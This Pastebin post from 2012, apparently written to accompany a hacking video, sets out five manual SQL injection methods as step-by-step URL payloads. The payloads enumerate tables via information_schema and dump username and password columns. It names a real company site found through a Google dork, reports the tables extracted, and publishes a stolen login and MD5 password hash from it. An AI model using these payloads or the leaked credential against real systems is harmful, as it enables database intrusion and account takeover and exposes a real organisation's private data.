Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Salamlar... Bu Video-da Sadə,qısa 1 üsül ilə bərabər sayt üzərindən SQL manual injection Göstərmişəm... Təzə Üsül Oldu sizə Manual Yolla getməyin 5 üsulu nəsə sualınız olsa Buyurun! Əməyə Hörmət + Enjoy !
- [youtube]SQXrwxg2-Es[/youtube]
- Source[Volume1]:
- [code]SQL Injection Manual Volume 1
- 0-dan Sona :
- http://site.com/index.php?id=50
- http://site.com/index.php?id='50
- http://site.com/index.php?id=50 order by 52--
- http://site.com/index.php?id=-50 union all select 1,2,3,4,5,6,7,8,9,10,11--
- http://site.com/index.php?id=-50 union all select 1,2,version(),4,5,6,7,8,9,10,11--
- http://site.com/index.php?id=-50 union all select 1,2,table_name,4,5,6,7,8,9,10,11 FROM information_schema.tables--
- http://site.com/index.php?id=-50 union all select 1,2,column_name,4,5,6,7,8,9,10,11 FROM information_schema.column--
- http://site.com/index.php?id=-50 union all select 1,2,schema_name,4,5,6,7,8,9,10,11 FROM information_schema.schemata--
- http://site.com/index.php?id=-50 union all select 1,2,contact(username,0x3,password),4,5,6,7,8,9,10,11 FROM database_name.table_name--
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Volume 1 :
- Tapdigim columns-larin sayi :
- # Number of the Columns : 15
- # Useful : 2
- # Version : 5.0.77
- # Table Name : _user
- # Columns Name : username , password
- # Result : 0
- # This way for this site : NO USEFUL!
- Bu yol alinmadi bu site ucun indi Volume 2-ni yoxlayaq[amma 5-den yuxarilarda ishlekdir...][/code]
- Source[Volume2]:
- [code]SQL Injection Manual Volume 2
- 0-dan Sona :
- http://site.com/index.php?id=5
- http://site.com/index.php?id='5
- http://site.com/index.php?id=5 order by 10--
- http://site.com/index.php?id=-5 union select 1,2,3,4,5,6,7--
- http://site.com/index.php?id=-5 union select 1,2,@@version,3,4,5,6,7--
- http://site.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()
- Google : Text to hex converter
- Site: http://swingnote.com/tools/texttohex.php
- http://site.com/index.php?id=-5 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=0xHex(tablenin Hex-i)
- http://site.com/index.php?id=-5 union select 1,2,group_concat(columnuser,0x3a,columnpass),4,5,6,7 from table
- Dork : Text to Hex Converter
- Volume 2:
- # Version : 5.0.77
- # Table Name : _user
- # Encode Table Name : 5f75736572
- # Useful : NOT
- Demeli bu version-da bu ishlemedi...[/code]
- Source[Volume3]:
- [code]SQL Injection Manual Volume 3
- 0-dan Sona :
- http://site.com/index.php?id=5
- http://site.com/index.php?id='5
- http://site.com/index.php?id=5 order by 1--
- http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
- http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 2,1--
- http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 10,1--
- http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 20,1--
- http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5 FROM information_schema.columns where(table_name=0xHex)limit 1,1--
- http://site.com/index.php?id=-5 union all select 1,2,group_concat(admin,0x3a,password),4,5 FROM admin--
- # Hex Encode Site : http://mikezilla.com/exp0012.html
- Volume 3 :
- # 5F75736572
- # Columns - Username , password
- # Bingo :D Tapildi bu Yol ile olar... Indi 4-cu yola baxaq...
- [/code]
- Source[Volume4]:
- [code]SQL Injection Manual Volume 4
- 0-dan Sona :
- http://site.com/index.php?id=5
- http://site.com/index.php?id='5
- http://site.com/index.php?id=5 order by 1--
- http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
- http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables--
- http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5 FROM information_schema.columns where table_name=Char(char code)
- http://site.com/index.php?id=-5 union all select 1,2,concat(admin,0x3a,password),4,5 FROM admin--
- Dork : Convert to ASCII
- Volume 4 :
- # Esas olanlar tapildi... indi ishimizi tekrarlayaq...
- # Ve Bingo Yene :D
- # Indi ise bashqa sade ve en asand yolu yoxlayaq...[/code]
- Source:
- [code]++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- # Date : 2012:04:25
- # Subject : SQL injection Manual Volume 1+2+3+4 With [Target Site]
- # Author : Avatar [Fearless]
- # Dork : inurl:product.php?id=1
- # Target Site : www.bcspeakers.com/product.php?id=1
- # Software : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D
- # Team'Z : AA Team // PC Team // PWN Team :D // The Fear // UG Team
- # Language : Azerbaijani Language
- # Localation : Sweden/Sundsvall
- # Greet'Z to : All member'z of the Team'Z
- # Respect to : All my Bro'Z!
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Let's Start :
- Salamlar... Bu Gune qeder[Bu gunde daxil olmaqla] sizlere 4 yol/usul gosterdim SQL Injection Manual yolla 4 Volume ve bu gun bunlarin hamisini 1 site-de
- yoxlayacagiq... men yoxladim perfect amma sadece 1-in indi ise sizinle o birilerinde yoxlayiram diqqetle baxib anlayin... demeli dorkumuz ve sitemiz
- bulardi.... ilk olaraq 1-ci usuldan bashlayiram
- [/code]
- Source[Volume5]:
- [code]++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- # Date : 2012:04:25
- # Subject : SQL injection Manual Volume 5
- # Author : Avatar [Fearless]
- # Dork : inurl:product.php?id=1
- # Target Site : www.bcspeakers.com/product.php?id=1
- # Software : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D
- # Team'Z : AA Team // PC Team // PWN Team :D // The Fear // UG Team
- # Language : Azerbaijani Language
- # Localation : Sweden/Sundsvall
- # Greet'Z to : All member'z of the Team'Z
- # Respect to : All my Bro'Z!
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Let's Start:
- Izleyin...
- # Table Name : _user
- # Columns Name'z : username , password
- # Pass+Login : becspeak2803:286adae502ad9d5ab8c4f8644050b448
- # Pass+Login : becspeak2803:286adae502ad9d5ab8c4f8644050b448
- # Ve Bingo yene :D buda bashqa 1 usul... Ve sade... indi devam edek
- # Ve indide gel bunu qiracaq program / site axtar teshekkurler izlediyiniz ucun Video by. Avatar Fearless
- thank'Z For Watching... Bye ![/code]
- 0-dan sona :
- [code]http://site.com/index.php?id=5
- http://site.com/index.php?id='5
- http://site.com/index.php?id=5 order by 10--
- http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
- http://site.com/index.php?id=-5 union all select 1,@@version,3,4,5--
- http://site.com/index.php?id=-5 union all select 1,table_name,3,4,5 from information_schema.tables--
- http://site.com/index.php?id=-5 union all select 1,column_name,3,4,5 from information_schema.columns--
- http://site.com/index.php?id=-5 union all select 1,group_concat(username,0x3a,password)3,4,5 from _user
- [/code]
- Site Login + Pass:
- [code]# Login : becspeak2803
- # Password : [Nothing]
- # Password[MD5] : 286adae502ad9d5ab8c4f8644050b448
- # Target Site : www.bcspeakers.com/
- # Dork : inurl:product.php?id=1
- # Open : www.bcspeakers.com/product.php?id=1
- # Admin Panel : [Not Found][/code]
Add Comment
Please, Sign In to add comment